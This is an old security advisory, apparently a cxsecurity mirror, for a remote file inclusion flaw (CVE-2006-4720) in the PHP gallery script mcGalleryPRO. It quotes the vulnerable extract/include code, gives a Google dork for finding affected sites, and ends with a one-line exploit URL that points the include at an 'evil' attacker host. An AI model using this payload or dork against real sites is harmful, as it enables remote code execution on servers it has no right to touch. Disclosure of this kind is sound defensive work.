Bug: Mcgallerypro (path_to_folder) Remote File Inclusion ( Ascii Version )

Search:
WLB2

Mcgallerypro (path_to_folder) Remote File Inclusion

Published
Credit
Risk
2006.09.18
chris_hasibuan
High
CWE
CVE
Local
Remote
N/A
CVE-2006-4720
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
7.5/10
6.4/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial

#############################SolpotCrew Community################################

#

# Mcgallerypro (path_to_folder) Remote File Inclusion

#

# Download file : http://phpforums.net/mcgp/mcgp.zip/mcgp.zip

#

########################################################################
#########

#

#

# Bug Found By :Solpot a.k.a (k. Hasibuan) (10-09-2006)

#

# contact: chris_hasibuan (at) yahoo (dot) com [email concealed]

#

# Website : http://www.nyubicrew.org/adv/solpot-adv-06.txt

#

########################################################################
########

#

#

# Greetz: choi , h4ntu , Ibnusina , r4dja , No-profile , begu , madkid

# robby , Matdhule , setiawan , m3lky , NpR , Fungky , barbarosa

# home_edition2001 , Rendy , cow_1seng , ^^KaBRuTz , bYu , Lappet-homo

# Blue|spy , cah|gemblung , Slacky , blind_boy , camagenta , XdikaX

# x-ace , Dalmet , #nyubi , #hitamputih @dalnet

# and all member solpotcrew community @ http://www.nyubicrew.org/forum/

#

#

########################################################################
#######

Input passed to the "path_to_folder" is not properly verified

before being used to include files. This can be exploited to execute

arbitrary PHP code by including files from local or external resources.

code from random2.php

if (!empty($_SERVER)) { extract($_SERVER, EXTR_OVERWRITE); }

if (!empty($_GET)) { extract($_GET, EXTR_OVERWRITE); }

if (!empty($_POST)) { extract($_POST, EXTR_OVERWRITE); }

if (!empty($_COOKIE)) { extract($_COOKIE, EXTR_OVERWRITE); }

if (!empty($_SESSION)) { extract($_SESSION, EXTR_OVERWRITE); }

include ("$path_to_folder/admin/common.php");

include ("$path_to_folder/lang/$lang_def");

Google Dork; "powered by mcGalleryPRO"

exploit : http://somehost/path_to_mcgallerypro/random2.php?path_to_folder=http://e
vil

##############################MY LOVE JUST FOR U RIE#########################

######################################E.O.F#############################
#####

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version